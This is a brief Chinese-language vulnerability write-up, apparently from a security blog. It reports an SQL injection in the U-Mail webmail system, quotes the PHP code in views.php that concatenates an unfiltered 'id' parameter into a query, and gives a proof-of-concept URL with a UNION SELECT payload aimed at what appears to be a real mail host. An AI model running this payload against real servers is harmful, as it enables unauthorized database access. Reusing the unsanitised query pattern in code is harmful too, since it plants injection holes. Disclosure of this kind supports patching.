U-Mail邮件服务系统最新版SQL注入漏洞

漏洞文件:client\option\module\views.php [php] if ( ACTION == "letterpaper" ) { $lp_id = gss( $_GET['id'] ); if ( $lp_id ) { if ( $lp_id == "add" ) { $lp_info['letterpaper'] = "
"; } else { $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); } } else { $lp_list = $Widget->get_letterpaper( array( "fields" => "*", "where" => "UserID=0 or UserID=".$user_id, "orderby" => "UserID", "debug" => 0 ) ); } include( load_tpl( "op_letterpaper" ) ); } [/php] 未过滤直接进入查询 [php] $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); [/php] http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8 1 1e [php]

发表评论